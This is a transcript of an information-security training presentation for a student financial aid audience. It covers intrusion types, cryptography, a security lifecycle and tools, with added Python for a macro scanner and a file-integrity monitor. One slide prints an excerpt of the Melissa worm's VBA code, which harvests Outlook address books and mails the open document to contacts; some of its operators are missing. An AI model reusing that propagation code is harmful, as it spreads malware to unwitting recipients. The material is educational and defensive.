Transcript: Student Financial Assistance, Session 4 - Information Security: Protecting your Digital Resources

Session 4: Information Security: Protecting your Digital Resources
Session 4 -

Discussion Agenda
- Goals of an intrusion
- Categories of risk
- Effects and consequences of a compromise
- Techniques of security
- Reducing the risk: the security lifecycle

Intrusion Goals
- Defacement
- Utilization of resources as an anonymous platform for other attacks
- Performance degradation
- Data collection/manipulation

Risk Categories
- Hacking - usually accomplished through a known vulnerability in COTS (commercial off-the-shelf) software
- Cracking - usually accomplished by guessing weak or default passwords
- Spoofing - impersonation used to obtain credentials (telephonic, email, website, etc.)
All three aim at obtaining elevated privileges.

Risk Categories (cont.)
- Trojan Horse - typically self-replicating email-based worms (e.g. Code Red)
- Denial - denial of service (e.g. ping flood)
- Sabotage - disgruntled systems engineer
- Unintentional - natural disaster
- and more...

Melissa

    Dim UngaDasOutlook, DasMapiName, BreakUmOffASlice
    Set UngaDasOutlook = CreateObject("Outlook.Application")
    Set DasMapiName = UngaDasOutlook.GetNameSpace("MAPI")
    If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\", "Melissa?") "... by Kwyjibo" Then
    If UngaDasOutlook = "Outlook" Then
    DasMapiName.Logon "profile", "password"
    For y = 1 To DasMapiName.AddressLists.Count
    Set AddyBook = DasMapiName.AddressLists(y)
    x = 1
    Set BreakUmOffASlice = UngaDasOutlook.CreateItem(0)
    For oo = 1 To AddyBook.AddressEntries.Count
    Peep = AddyBook.AddressEntries(x)
    BreakUmOffASlice.Recipients.Add Peep
    x = x + 1
    If x 50 Then oo = AddyBook.AddressEntries.Count
    Next oo
    BreakUmOffASlice.Subject = "Important Message From " & Application.UserName
    BreakUmOffASlice.Body = "Here is that document you asked for ... don't show anyone else ;-)"
    BreakUmOffASlice.Attachments.Add ActiveDocument.FullName
    BreakUmOffASlice.Send
    Peep = ""
    Next y

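The Melissa excerpt above is shown on the slide as an example of a self-mailing Word macro. What follows is an added defender-side example, not part of the presentation: a small heuristic that scores extracted VBA source for the combination the slide shows (an auto-execute entry point, Outlook automation, address-book harvesting, attaching the open document, and sending). The indicator weights, thresholds and both sample macros are constructed assumptions.

```python
import re

# Constructed VBA fragment modelled on the Melissa excerpt on the slide; used only as scanner input.
SAMPLE_MACRO = '''
Private Sub Document_Open()
Set UngaDasOutlook = CreateObject("Outlook.Application")
Set DasMapiName = UngaDasOutlook.GetNameSpace("MAPI")
For y = 1 To DasMapiName.AddressLists.Count
BreakUmOffASlice.Recipients.Add Peep
BreakUmOffASlice.Attachments.Add ActiveDocument.FullName
BreakUmOffASlice.Send
End Sub
'''

# A harmless constructed macro with an auto-exec entry point, to show the scanner does not flag it.
BENIGN_MACRO = '''
Sub AutoOpen()
MsgBox "Remember to update the cover sheet"
End Sub
'''

# (name, pattern, weight). Auto-exec hooks are common in legitimate macros and score low;
# driving Outlook to walk the address book and send the open document is the mass-mailer signature.
INDICATORS = [
    ("auto_exec", r"\b(Document_Open|AutoOpen|Auto_Open)\b", 1),
    ("outlook_automation", r'CreateObject\s*\(\s*"Outlook\.Application"\s*\)', 3),
    ("mapi_session", r'\.GetNameSpace\s*\(\s*"MAPI"\s*\)', 2),
    ("address_harvest", r"\.AddressLists\b|\.AddressEntries\b", 3),
    ("self_attach", r"\.Attachments\.Add\s+ActiveDocument\.FullName", 4),
    ("send", r"\.Send\b", 2),
]

def score_macro(vba_source: str) -> dict:
    """Return the indicators found, a weighted score and a verdict for one VBA module."""
    hits = [name for name, pat, _ in INDICATORS if re.search(pat, vba_source, re.I)]
    score = sum(w for name, _, w in INDICATORS if name in hits)
    if score >= 10:
        verdict = "mass-mailer"  # Outlook automation plus address harvesting plus send
    elif score >= 5:
        verdict = "suspicious"
    else:
        verdict = "benign"
    return {"hits": hits, "score": score, "verdict": verdict}
```

In practice the VBA text would come from a macro extractor run on the document before it reaches a mailbox; the scoring logic itself is unchanged.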
Effects of a Compromise
- Unreliable data - surreptitious manipulation or explicit destruction
- Bad neighbor - not even recognizing you've been compromised and being used as a platform for attack
- Performance - if there is any...

Consequences
- Financial - data restoration, downtime, liquidated damages, etc.
- Legal - due diligence is required to protect Privacy Act data, consumer information, etc.
- Lost confidence - it's a tough sell to tell customers/business partners it won't happen again

Who would do such a thing...
- Criminal
- Magician
- Consumer advocate
- Political activist (WTO, civil rights, etc.)
- Cyber-warrior
- Security professional*

Core Security Services
- Identification/Authentication - something you know, have, or are
- Authorization - providing the right services to the right user
- Confidentiality - message obfuscation through cryptography
- Integrity - is that what I sent or stored?

Cryptography 101
- Symmetric: one key shared between parties; simple to manage, inexpensive to deploy; high encryption speeds
- Asymmetric: two distinct but mathematically related keys for each person (one public, one private); more secure, expensive, used in PKI; slower encryption speeds

Cryptography 201
- Algorithm choices: various choices with different strengths/weaknesses (RC5, DES, AES, etc.); usually based on hard problems (e.g. factoring involving large prime numbers)
- Key sizes: the larger the key, the more difficult it is to break the code

Things to avoid in a COTS vendor...
- "Trust us, we're experts" - Right...
- Secret algorithms - so how good are they?
- Revolutionary breakthrough - security is like new pharmaceuticals, not cars.
- Unbreakability - no such thing (brute force)

So how do we protect ourselves?
- Holistic approach
- Determine the true value at risk, then determine the level of protection
- Be prepared to invest financial and human resources
- Balance convenience with security
- Recognize it's a journey...

Security Lifecycle

Plan your work
- A Security Policy Document is critical to successfully define minimum security criteria for a given system.
- All AGI should participate and sign off
- The template can be tailored to business risk/value

Security Policy Template
- Network layer policies - router, firewall, DNS policies
- Application layer policies - token characteristics, crypto specifications
- Operating system policies - vendors, patch levels, minimum install
- Operational policies - backups, staffing/access, incident notification/response, virus updates
- System architecture policies - IVV, imposed standards, policy maintenance

Design
- Design in concert with the Security Plan
- Architects should have security experience
- Define the resources to secure and the mechanisms to do it (e.g. SSL will be used for screens containing SSNs)
- Select technologies that have superior track records

Develop
- Develop in concert with the Security Plan
- Share the importance of security with the team
- Perform peer code reviews for weaknesses/backdoors

Test
- Vulnerability analysis - measures system exposure; tools: NMAP (open-source port scanner), CyberScanner (commercial multi-function scanner), SATAN (open-source multi-function scanner)
- Independent penetration testing - third-party verification of the security status of a system; many companies offer white-hat services

Maintain
Two main aspects of maintenance:
- Tool oriented
- Process/procedure oriented

Maintain - Tools
- Intrusion detection - active monitoring of network protocol traffic, log files, port scanning; responses range from alarms to countermeasures! (e.g. ManHunt by Recourse Technologies, BlackICE Defender, Network ICE)
- Content monitoring - active monitoring of server file content; automated alert/recovery on file modification (defacement) (e.g. Tripwire for Servers by Tripwire)

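The content-monitoring idea on this slide (baseline the server's files, alert when one changes) in working form, as an added example that is not part of the presentation and not Tripwire's code: it hashes every file under a web root, saves the baseline outside that root, and later reports modified, added and deleted files. The directory layout and the defacement scenario in demo() are constructed.

```python
import hashlib
import json
import tempfile
from pathlib import Path

def file_digest(path: Path) -> str:
    """SHA-256 of a file, read in chunks so large files need not fit in memory."""
    h = hashlib.sha256()
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()

def build_baseline(root: str) -> dict:
    """Map every regular file under root (path relative to root) to its SHA-256."""
    baseline = {}
    for p in Path(root).rglob("*"):
        if p.is_symlink() or not p.is_file():
            continue  # skip links so a symlink cannot pull files outside root into the baseline
        baseline[str(p.relative_to(root))] = file_digest(p)
    return baseline

def compare(baseline: dict, current: dict) -> dict:
    """Report which files changed, appeared or disappeared since the baseline."""
    return {
        "modified": sorted(k for k in baseline if k in current and current[k] != baseline[k]),
        "added": sorted(set(current) - set(baseline)),
        "deleted": sorted(set(baseline) - set(current)),
    }

def check_tree(root: str, baseline_file: str) -> dict:
    """Diff the live tree against a saved baseline (keep that file outside root, ideally read-only)."""
    with open(baseline_file) as f:
        return compare(json.load(f), build_baseline(root))

def demo() -> dict:
    """Constructed scenario: baseline a tiny web root, deface index.html, drop a file, delete one."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp) / "htdocs"
        (root / "img").mkdir(parents=True)
        (root / "index.html").write_text("<h1>Welcome</h1>")
        (root / "img" / "logo.txt").write_text("logo bytes")
        (root / "about.html").write_text("<p>About us</p>")
        baseline_path = Path(tmp) / "baseline.json"  # outside the monitored root
        baseline_path.write_text(json.dumps(build_baseline(str(root))))
        (root / "index.html").write_text("<h1>Hacked</h1>")  # the defacement
        (root / "shell.txt").write_text("dropped file")
        (root / "about.html").unlink()
        return check_tree(str(root), str(baseline_path))
```

A scheduled run of check_tree() that alerts on any non-empty result, paired with redeploying the known-good copy, is the "automated alert/recovery" the slide describes.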
Maintain - Tools
- Honeypot monitoring - diversionary tactic; a dummy site to entice, expose, then exhaust a hacker (e.g. Deception ToolKit (DTK), ManTrap by Recourse Technologies)
- Tarpits - entice then entrap self-replicators (e.g. LaBrea)

Maintain - Processes
- Security awareness - subscribe to weekly newsletters (SANS)
- Protect your authentication tokens - no Post-its, no sharing
- Review the FBI's Top 20 Security Mistakes issued on 10/2/2001 and make sure you aren't wanted! (http://66.129.1.101/top20.htm)

Maintain - Processes
- Configuration management - use defined procedures for modifications; require review boards; allow only authorized staff to make changes
- Regular virus prevention
- Backup - offsite, rotated media

Maintain - Processes
Hmm...
"At the CERT Coordination Center, we have learned that over 95% of all network intrusions could be avoided by keeping your computer systems up to date with patches from your operating system and applications vendors. If you do nothing else, you should install these patches wherever possible, and as quickly as possible."

Internet Resources

Resource | URL | Comment
Systems Administration, Networking, and Security (SANS) | www.sans.org | Excellent email newsletter; hosts the FBI/SANS Top 20 list
CERT by Carnegie-Mellon | www.cert.org | One of the original security sites on the net
RSA Labs Cryptography FAQ | www.rsasecurity.com/rsalabs/faq/index.html | Learn how cryptography works
Attrition Hacker Site | www.attrition.org | Their motto: "Don't let school get in the way of your education"
PentaSafe Publications | www.baselinesoft.com | Security policy templates

Thanks for coming!
This presentation will be posted at this site at the conclusion of the EAC series: http://edeworkshop.ncspearson.com/
Thank you and see you next year!